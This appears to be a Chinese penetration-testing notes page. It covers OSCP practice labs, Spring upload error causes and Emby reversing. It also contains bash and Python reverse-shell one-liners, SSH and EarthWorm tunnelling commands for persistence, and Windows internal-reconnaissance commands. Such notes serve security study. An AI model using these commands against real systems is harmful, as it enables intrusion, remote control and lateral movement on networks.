oscp靶场训练
– 从易到难准备阶段
🟢 入门阶段(基础漏洞与提权练习)
| 靶场平台 | 推荐靶机/课程 | 链接 |
|---|---|---|
| VulnHub | Kioptrix 1~5、Stapler、Mr. Robot | VulnHub |
| TryHackMe | Basic Pentesting、Linux PrivEsc | TryHackMe |
| Hack The Box | Lame、Blue、Legacy | Hack The Box |
🟡 中级阶段(模拟 OSCP 环境与 Active Directory)
| 靶场平台 | 推荐靶机/课程 | 链接 |
|---|---|---|
| OffSec Proving Grounds | Jacko、Twiggy、HelpDesk | Proving Grounds |
| CyberSecLabs | Roast、Brute、Sync | CyberSecLabs |
| TryHackMe | Attacktive Directory | TryHackMe |
🔴 高级阶段(接近 OSCP 考试环境)
| 靶场平台 | 推荐靶机/课程 | 链接 |
|---|---|---|
| OffSec PWK Labs | 官方 PWK 课程所有机器 | PWK Labs |
| Hack The Box | Buff、OpenAdmin、Blunder、Resolute | Hack The Box |
| Virtual Hacking Labs | Windows/Linux 高级靶机 | Virtual Hacking Labs |
spring常见报错构造发包
前言
真是一个渗透半个开发
有时根据api直接构造请求包会报错500,不是发不了,只是可能请求头或请求体构造的不一样,已接触的报错记录如下:
Spring MVC、Spring Boot的文件上传报错记录
大致如下:
| 错误提示 | 常见原因 |
|---|---|
| not a multipart | 没用 multipart/form-data |
| no boundary | 自己写 Content-Type 没有 boundary |
| required param missing | 必填参数没传 |
| file too big | 超出上传限制 |
| method not supported | 请求方法错 |
| parse body failed | 格式不一致 |
| missing part | FormData 里漏了某个字段 |
正则匹配脚本
内网横向+加固
1-加固
Reverse Shell定时任务
#定时任务&系统级或用户级自启
#反向ssh
1 | ssh -R 6000:localhost:22 user@A的公网IP |
#反弹shell
1 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 |
#python
1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' |
#使用 Zerotier / Tailscale 搭建虚拟局域网
或者使用sock代理,处于同一网络易漏扫,连接方式,下载EarthWorm
1 | ew -s rcsocks -l 1900 -e 1200 |
#内存码的注入
#cs木马
emby逆向记录
1-前言
参考文章破解Emby Server/Client For iOS/MacOS/Linux/Android 通杀方案 - 吾爱破解 - 52pojie.cn
逆向案例,但好像也只解决的显示问题,对于硬解,可能需要搭建服务器传输必要参数内容才行。
内网信息搜集
Windows常用搜集命令:
ipconfig /all |
查询网络配置信息 |
|---|---|
| systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本” | 查询操作系统版本-中文 |
| systeminfo | findstr /B /C:”OS Name” /C:”OS Version” | 查询操作系统版本-英文 |
| echo %PROCESSOR_ARCHITECTURE% | 查看系统体系结构 |
| wmic product get name,version | 安装软件版本信息 |
| powershell “Get-WmiObject -class Win32_Product | Select-Object -Property name,version” | 收集软件版本信息 |
| wmic service list brief | 查询本机服务信息 |
tasklist /svc |
查询进程列表信息 |
| wmic startup get command,caption | 查看启动程序信息 |
| schtasks /query /fo LIST /v | 查看计划任务信息 |
| net statistics workstation | 查看主机开机时间 |
| net user | 查询用户列表信息 |
| net localgroup administrators | 获取本地管理员(通常含有域用户) |
| query user || qwinsta | 查看当前在线用户信息 |
| net session | 查客户端会话信息(管理员权限) |
netstat -ano |
查询端口列表信息 |
Systeminfo |
查询补丁列表信息 |
| wmic qfe get Caption,Description,HotFixID,InstalledOn | wmic来识别安装在系统中的补丁 |
net share |
查看本机共享信息 |